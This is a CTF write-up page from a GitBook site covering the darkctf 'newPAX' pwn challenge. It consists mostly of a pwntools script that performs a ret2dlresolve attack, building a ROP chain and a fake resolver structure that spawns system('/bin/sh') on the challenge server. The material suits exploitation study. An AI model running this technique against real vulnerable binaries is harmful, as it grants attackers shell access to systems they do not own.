Writeups
  • crypt0nite
  • CTFs
    • darkctf
      • Web
        • Simple SQL
      • Rev
        • helloworld
      • pwn
        • roprop
        • newPAX
      • OSINT
        • Find Cell
        • Dark Social Web
      • Linux
        • Linux Starter
        • Find Me
      • forensics
        • Wolfie's Contact
        • Free Games
        • AW
      • crypto
        • haXXor
        • Pipe Rhyme
    • csictf
      • Crypto
        • Mein Kampf
        • Rivest-Shamir-Adleman
      • Linux
        • AKA
      • Miscellaneous
        • No DIStractions
      • OSINT
        • Pirates of the Memorial
        • Commitment
        • Flying Places
        • Shaken
      • Pwn
        • Pwn Intended 0x1
        • Pwn Intended 0x2
        • Pwn Intended 0x3
        • Global Warming
        • Smash
        • Secret Society
      • Reversing
        • Blaise
        • RicknMorty
      • Web
        • Oreo
        • Mr. Rami
        • The Confused Deputy
    • NahamCon
      • Crypto
        • Unvreakable Vase
        • Ooo-La-La
        • HomeCooked
        • DocXor
      • Forensics
        • Volatile
        • Microsooft
        • Cow Pie
      • Miscellaneous
        • Fake File
        • Alkatraz
      • Mobile
        • CAndroid
        • Simple App
      • OSINT
        • New Year's Solutions
        • Tron
      • Pwn
        • Dangerous
      • Scripting
        • Rotten
        • Really Powerful Gnomes
      • Steganography
        • KSteg
      • Web
        • PHPhone Book
        • Official Business
        • Localghost
        • Agent 95
    • BSides Delhi
      • Thanks for Attending
      • Cookie Robot
    • hacktoberctf
      • Traffic Analysis
        • Evil Corp's Child 1, 2 and 3
        • Remotely Administered Evil 1 and 2
        • An Evil Christmas Carol 1 and 2
      • Forensics
        • Captured Memories
        • Amcaching In
      • Linux
        • Talking To The Dead
Powered by GitBook
On this page

Was this helpful?

Export as PDF
  1. CTFs
  2. darkctf
  3. pwn

newPAX

Briefing:

Even though Solar Designer gave you his times technique, you have to resolve(sort-out) yourself and go deeper. This time rope willn't let you have anything you want but you have to make a fake rope and get everything.
nc pwn.darkarmy.xyz 5001

super basic ret2dlresolve exploit

from pwn import *

elf = context.binary = ELF('./newPaX', checksec=False)

if args.REMOTE:
    p = remote('newpax.darkarmy.xyz', 5001)
else:
    p = process()
rop = ROP(elf)

# obviously a ret2dlresolve
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 52)
rop.read(0, dlresolve.data_addr, 100)
rop.ret2dlresolve(dlresolve)

p.sendline(rop.chain())

p.sendline(dlresolve.payload)                # now the read is called and we pass all the relevant structures in

p.interactive()
PreviousropropNextOSINT

Last updated 4 years ago

Was this helpful?